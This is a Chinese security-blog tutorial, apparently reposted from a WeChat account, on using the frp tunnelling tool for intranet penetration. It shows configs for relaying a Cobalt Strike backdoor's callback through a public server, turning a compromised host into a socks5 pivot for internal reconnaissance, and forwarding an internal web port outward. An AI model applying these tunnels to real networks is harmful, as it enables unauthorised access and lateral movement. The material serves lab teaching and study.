Frp
1、工具&环境准备
-
工具 - frps frpc
Frp 夸克网盘【公众号回复frp】
Frp Github项目【https://github.com/fatedier/frp】
-
环境
一台公网环境 - frps 服务端一台内网环境 - frpc 客户端
2、演示案例
2.1、CS
上线
# 服务端# frps.tomlbindPort = 7000 # 绑定7000端口# 运行./frps -c frps.toml
# frpc.toml# 连接到服务端的7000端口serverAddr = "114.55.XXX.XXX" # 服务器IPserverPort = 7000 # 服务端bind端口# 将本地的5555端口 映射到 服务端的6000端口[[proxies]]name = "test-tcp"type = "tcp"localIP = "127.0.0.1" # 本地localPort = 5555 # 本地端口remotePort = 6000 # 远程端口# 运行./frpc -c frpc.toml
# CS监听器1:114.55.XXX.XXX 6000监听器2:192.168.47.198 5555生成后门用监听器1 -> 连接 -> 远程的6000 映射到本地5555 -> 监听器也正在监听5555 -> 上线
2.2、建立socks
节点做信息搜集
环境:当我们获得一个shell时,想继续内网探测做信息收集 -> 可以通过frp来弄一个socks节点 -> 以此来做信息收集
frp服务端 - 公网frp客户端 - 获得shell的一台机器 192.168.2.129信息收集 - 与获得shell的机器在同一个内网下 192.168.2.128
# 服务端配置文件# frpsock.ini[common]bind_port = 7000bind_addr = 0.0.0.0# logindashboard_port = 7500 # web端口 UI界面dashboard_user = admindashboard_pwd = admin@123log_frp = /var/log/frps.loglog_level = infolog_max_days = 3authentication_timeout = 0max_pool_count = 50allow_ports = 80-50000
# 客户端# frps.toml[common]server_addr = "114.55.XXX.XXX"server_port = 7000tls_enable = truepool_count = 5[plugin_socks]name = "test-tcp"type = "tcp"plugin = socks5plugin_user = adminplugin_passwd = admin@123remote_port = 6000use_encryption = trueuse_compression = true
# Proxifier 配置socks代理
在两台虚拟机中安装phpstudy192.168.2.129 --- 192.168.2.128均可在物理机本机访问
2.3、端口映射转发做信息收集
访问服务端的114.55.XXX.XXX:8888 -> 转发到由客户端访问192.168.2.128:80
# 服务端bindPort = 7000
# 客户端serverAddr = "114.55.XXX.XXX"serverPort = 7000[[proxies]]name = "test-tcp"type = "tcp"localIP = "192.168.2.128"localPort = 80remotePort = 8888
原文始发于微信公众号(夜风Sec):内网初探【Frp穿透】
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论